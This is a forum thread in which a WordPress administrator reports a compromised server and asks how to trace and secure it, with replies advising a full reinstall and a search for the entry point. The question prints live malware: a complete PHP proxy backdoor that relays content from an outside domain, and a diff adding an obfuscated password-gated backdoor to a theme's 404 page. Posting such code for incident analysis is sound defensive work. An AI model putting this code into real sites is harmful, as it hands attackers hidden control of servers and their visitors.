0

Env

  • Rackspace cloud server
  • Wordpress 3.9.1
  • Ubuntu 12.04 Linux web.mydomain.com 3.2.0-67-virtual #101-Ubuntu SMP Tue Jul 15 17:58:37 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

History

These may actually be part of the same issue, I have already resolved those yesterday. Adding here for reference and background history.

My current security problem

My web server has been recently experiencing some unusual out-of-memory issue caused by an abnormal sendmail activity. For this I got help from the ServerFault forum, but I am yet identify the vulnerability.

Apparently my server was subject to attack through the wordpress plugins, and apparently it's still happening despite:

  • Cleaned my wordpress instance, used a working backup
  • Updated all the wordpres plugins
  • apt-get update && apt-get upgrade on the server

After a day, I am checking my wordpress instance, and I can already find, what I believe, is some injected PHP code.

root@web:/var/www# git status
# On branch working-website
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#   (commit or discard the untracked or modified content in submodules)
#
#   modified:   .htaccess
#   modified:   webalizer/index.html
#   modified:   webalizer/usage.png
#   modified:   webalizer/webalizer.hist
#   modified:   wp-content/plugins/no-disposable-email/no_disposable_email.log
#   modified:   wp-content/themes/twentytwelve/404.php    <===========
#
# Untracked files:
#   (use "git add <file>..." to include in what will be committed)
#
#   webalizer/ctry_usage_201407.png
#   webalizer/daily_usage_201407.png
#   webalizer/hourly_usage_201407.png
#   webalizer/usage_201407.html
#   wp-includes/ms-edit.php       <=================

A new unexpected file (?):

root@web:/var/www# more wp-includes/ms-edit.php 
<?php $url = "http://admindors.com/redbutton/main2-dors/20j-107-1/"; $e = '.php'; $q = ""; $test = 'suka-test'; if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_
GET[$q] : $_SERVER["QUERY_STRING"])) { if($test && $a == $test) { echo 'OK'; exit; } curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h)))
, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); if (isset($_SERVER[
"HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); $result = curl_exec($ch); if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo
($ch, CURLINFO_EFFECTIVE_URL))) { header('Location: ' . $u, true, $c); exit; } else if ($c == 200 && $result) { header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE)); echo ($h || subs
tr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '
/' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)
>/i', '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>', preg_replace('/<(a|link|img)(.*?)(href|src)=["\']([^\/][a-z0-9-_\.\/]+)["\'](.*?)>/i', '<$1$
2$3="' . $t . '$4"$5>', preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result))) : $result; exit; } } header('HTTP/1.0 404
 Not Found', true); exit; ?>

My suspicion is the URL (http://admindors.com/redbutton/main2-dors/20j-107-1/) in the PHP code.

Also as GIT points out, this is a new untracked file.

also my wp-content/themes/twentytwelve/404.php seemed also be compromised:

root@web:/var/www# git diff wp-content/themes/twentytwelve/404.php

diff --git a/wp-content/themes/twentytwelve/404.php b/wp-content/themes/twentytwelve/404.php
index e7270b4..189b69c 100644
--- a/wp-content/themes/twentytwelve/404.php
+++ b/wp-content/themes/twentytwelve/404.php
@@ -1,3 +1,9 @@
+<?php^M
+if(isset($_GET['pwd'])) {^M
+$_F=__FILE__;$_X='P2lCPz5NY2VXKDxlbk1bVV85TTJPOU0oJzhDcjA5Qy5BMkNyNTJxRlAzLzh5YlR1THU0RlVFa0VXRUMzVXU0S0xFWWJrdVlifWJUOXlOVDgKYlRXV2JxMzE0d095YmtQbjxKM3htcEZzM2tnWUVwMzE0d095TkM2WWJENm45clAuYkpnWj
+^M
+} else {^M
+?>^M
 <?php
 /**
  * The template for displaying 404 pages (Not Found).
@@ -26,4 +32,7 @@ get_header(); ?>
                </div><!-- #content -->
        </div><!-- #primary -->

-<?php get_footer(); ?>
\ No newline at end of file
+<?php get_footer(); ?>^M
+<?php^M
+}^M
+?>
\ No newline at end of file

At this point, I am not sure how to secure my wordpress?

How can I identify the culprit?

What can I do next?

Community
  • 1
zabumba
  • 161
  • 1
  • 8

1 Answers1

0

What to do next? Wipe the server clean and re-install, making sure you're using the latest versions of everything. Once an attacker gets in, it's difficult or impossible to figure out what's been tampered with. You could try making a copy of the compromised server for offline analysis, but you probably won't find anything interesting: if the attacker can tamper with your software, they can tamper with the logs.

Mark
  • 34,390
  • 9
  • 85
  • 134
  • That's not enough. If you wipe the server clean and reinstall the same vulnerable software or configuration, the attacker will be back. You need to figure out how the attacker got in. – Gilles 'SO- stop being evil' Jul 26 '14 at 08:26